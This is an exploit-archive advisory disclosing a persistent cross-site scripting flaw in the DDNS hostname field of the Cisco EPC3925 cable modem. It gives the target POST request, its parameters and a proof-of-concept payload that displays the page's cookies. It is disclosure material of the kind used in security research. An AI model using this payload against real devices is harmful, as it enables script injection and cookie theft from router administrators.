1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
####################################################################### # Exploit Title: Cisco EPC3925 - Persistent Cross Site Scripting # Google Dork: N/A # Date: 12-11-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.cisco.com # Software Link: Not public # Version: epc3925-E10-5-v302r125572-130520c # Tested on: Cisco EPC3925 # CVE: N/A ####################################################################### # Description # The parameter DdnsHostName is vulnerable to Persistent Cross Site Scripting. # However, there is client side input validation, which can easily be bypassed. # # Location: # # POST http://[target]/goform/Setup_DDNS # # Parameters: # #DdnsService=0&DdnsUserName=xxx&DdnsPassword=****&DdnsHostName=<Enter Payload Here>&save=Save+Settings # # Payload # # PoC: "><input onmouseover=prompt(document.cookie)> # # Check out the video at: http://www.nerdbox.it/cisco-epc3925-persistent-xss/ |